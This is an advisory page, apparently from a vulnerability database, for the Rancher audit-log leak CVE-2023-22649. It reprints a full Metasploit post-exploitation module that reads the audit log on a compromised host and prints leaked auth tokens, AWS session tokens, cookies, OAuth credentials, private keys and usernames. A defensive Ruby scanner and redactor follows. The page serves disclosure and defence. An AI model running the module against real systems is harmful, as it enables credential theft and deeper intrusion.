Rancher Audit Log Sensitive Information Leak

Published: 10 Apr 2024 19:54:27
Reported by: h00die
Type: metasploit
Source: www.rapid7.com
Views: 252

Rancher Audit Log sensitive information leak affecting versions 2.6.0 through 2.8.1. Only deployments with the API Audit Log enabled are impacted. Leaked information is found in request headers, response headers, and request and response bodies.

Related

Reporter | Title | Published | Family
Chainguard | CVE-2023-22649 vulnerabilities | 2 Jul 2026 14:17 | cgr
Circl | CVE-2023-22649 | 10 Apr 2024 16:08 | circl
CNNVD | Rancher Log Information Disclosure Vulnerability | 16 Oct 2024 00:00 | cnnvd
CVE | CVE-2023-22649 | 16 Oct 2024 07:46 | cve
Cvelist | CVE-2023-22649 Rancher 'Audit Log' leaks sensitive information | 16 Oct 2024 07:46 | cvelist
Github Security Blog | Rancher 'Audit Log' leaks sensitive information | 8 Feb 2024 18:44 | github
NVD | CVE-2023-22649 | 16 Oct 2024 08:15 | nvd
OSV | CGA-M248-MW8G-CRWG | 2 Jul 2026 12:58 | osv
OSV | CVE-2023-22649 | 16 Oct 2024 08:15 | osv
OSV | GHSA-XFJ7-QF8W-2GCR Rancher 'Audit Log' leaks sensitive information | 8 Feb 2024 18:44 | osv

Code

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Rancher Audit Log Sensitive Information Leak',
        'Description' => %q{
          Rancher versions between 2.6.0-2.6.13, 2.7.0-2.7.9, 2.8.0-2.8.1 inclusive
          contain a vulnerability where sensitive data is leaked into the audit logs.
          Rancher Audit Logging is an opt-in feature, only deployments that have it
          enabled and have AUDIT_LEVEL set to 1 or above are impacted by this issue.

          Tested against rancher 2.6.0.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # msf module
        ],
        'Platform' => ['linux', 'unix'],
        'SessionTypes' => ['shell', 'meterpreter'],
        'References' => [
          [ 'GHSA', 'xfj7-qf8w-2gcr' ],
          [ 'URL', 'https://ranchermanager.docs.rancher.com/how-to-guides/advanced-user-guides/enable-api-audit-log#api-audit-log-options'],
          [ 'CVE', '2023-22649']
        ],
        'DisclosureDate' => '2024-02-08',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => []
        }
      )
    )
    register_advanced_options [
      OptString.new('LOGFILE', [ true, 'The log file to analyze', '/var/log/auditlog/rancher-api-audit.log' ])
    ]
  end

  def run
    # docker install, and default path according to https://ranchermanager.docs.rancher.com/how-to-guides/advanced-user-guides/enable-api-audit-log#api-audit-log-options
    fail_with Failure::BadConfig, "#{datastore['LOGFILE']} is not readable or not found" unless readable?(datastore['LOGFILE'])

    log = read_file(datastore['LOGFILE'])
    loot = store_loot('rancher.api.log', 'text/plain', session, log, 'rancher.api.txt', 'Rancher API Log')
    print_good("Rancher log saved to: #{loot}")

    usernames_found = []
    table = Rex::Text::Table.new('Header' => 'Leaked Information', 'Indent' => 1, 'Columns' => ['Field', 'Value', 'Location'])

    log.each_line do |line|
      leaky_request_headers = ['X-Api-Auth-Header', 'X-Amz-Security-Token']
      leaky_response_headers = ['X-Api-Set-Cookie-Header']
      leaky_request_body = ['credentials', 'applicationSecret', 'oauthCredential', 'serviceAccountCredential', 'spKey', 'spCert', 'certificate', 'privateKey']

      begin
        json_line = JSON.parse(line)
      rescue JSON::ParserError
        next # skip blank or truncated lines instead of aborting the whole scan
      end

      if json_line.key? 'requestHeader'
        leaky_request_headers.each do |leaky_field|
          next unless json_line['requestHeader'].key? leaky_field

          secret = json_line['requestHeader'][leaky_field]
          secret = secret.join(' ') if secret.is_a?(Array)
          print_good("Found #{leaky_field}: #{secret}")
          table << [leaky_field, secret, 'requestHeader']
        end
      end

      if json_line.key? 'responseHeader'
        leaky_response_headers.each do |leaky_field|
          next unless json_line['responseHeader'].key? leaky_field

          secret = json_line['responseHeader'][leaky_field]
          secret = secret.join(' ') if secret.is_a?(Array)
          print_good("Found #{leaky_field}: #{secret}")
          table << [leaky_field, secret, 'responseHeader']
        end
      end

      if json_line.key? 'requestBody'
        leaky_request_body.each do |leaky_field|
          next unless json_line['requestBody'].key? leaky_field

          secret = json_line['requestBody'][leaky_field]
          secret = secret.join(' ') if secret.is_a?(Array)
          print_good("Found #{leaky_field}: #{secret}")
          table << [leaky_field, secret, 'requestBody']
        end
      end

      if json_line.key? 'responseBody'
        leaky_request_body.each do |leaky_field|
          next unless json_line['responseBody'].key? leaky_field

          secret = json_line['responseBody'][leaky_field]
          secret = secret.join(' ') if secret.is_a?(Array)
          print_good("Found #{leaky_field}: #{secret}")
          table << [leaky_field, secret, 'responseBody']
        end
      end

      usernames = json_line.dig('user', 'extra', 'username')
      next if usernames.nil?

      usernames_found += usernames
    end

    usernames_found.uniq.each do |username|
      table << ['Username', username, 'Requests']
    end

    print_line
    print_line(table.to_s)
  end
end
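A defender-side companion to the module above, added here as an example and not part of the Metasploit module or of Rancher: it checks audit-log lines for the same leaky fields the module reports, survives lines that are not JSON, and produces a redacted copy so a log retained after upgrading no longer carries the secrets. The field names are those used by the module; the sample log lines are constructed, not captured output.

```ruby
require 'json'

# Fields the module above treats as leaky, keyed by the audit-record section they appear in.
BODY_FIELDS = %w[credentials applicationSecret oauthCredential serviceAccountCredential
                 spKey spCert certificate privateKey].freeze
LEAKY_FIELDS = {
  'requestHeader'  => %w[X-Api-Auth-Header X-Amz-Security-Token],
  'responseHeader' => %w[X-Api-Set-Cookie-Header],
  'requestBody'    => BODY_FIELDS,
  'responseBody'   => BODY_FIELDS
}.freeze

# Scan one audit-log line. Returns [section, field] pairs whose values are leaked secrets,
# or nil when the line is not a JSON object (blank line, partial write, non-JSON noise).
def scan_audit_line(line)
  record = JSON.parse(line)
  return nil unless record.is_a?(Hash)
  LEAKY_FIELDS.flat_map do |section, fields|
    part = record[section]
    next [] unless part.is_a?(Hash)
    fields.select { |f| part.key?(f) }.map { |f| [section, f] }
  end
rescue JSON::ParserError
  nil
end

# Return a copy of the line with every leaky value replaced, so a log retained after the
# upgrade no longer carries the secrets. Lines that are not JSON objects pass through unchanged.
def redact_audit_line(line)
  record = JSON.parse(line)
  return line unless record.is_a?(Hash)
  LEAKY_FIELDS.each do |section, fields|
    part = record[section]
    next unless part.is_a?(Hash)
    fields.each { |f| part[f] = '[REDACTED]' if part.key?(f) }
  end
  JSON.generate(record)
rescue JSON::ParserError
  line
end

# Constructed sample lines (not real Rancher output): the first leaks an auth header and a
# body credential, the second is clean, the third is the kind of noise a scanner must survive.
SAMPLE_LOG = [
  '{"requestHeader":{"X-Api-Auth-Header":["Bearer tok-abc"],"User-Agent":["curl"]},' \
  '"requestBody":{"credentials":"s3cr3t"},"user":{"extra":{"username":["admin"]}}}',
  '{"requestHeader":{"User-Agent":["curl"]},"responseBody":{"type":"collection"}}',
  'not json at all'
].freeze
SAMPLE_LOG.each_with_index { |l, i| puts "line #{i + 1}: #{scan_audit_line(l).inspect}" }
```

Pointing the scanner at the real file (the module's default path is /var/log/auditlog/rancher-api-audit.log) tells you whether an affected deployment actually wrote secrets before it was patched, and the redacted output is what to keep if the log must be retained.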

Scores (current as of 02 Jul 2026 19:03)
Vulners AI Score: 6.5 (Medium risk)
CVSS 3.1: 6.5 - 8.4
CVSS 4: 8.4
EPSS: 0.01882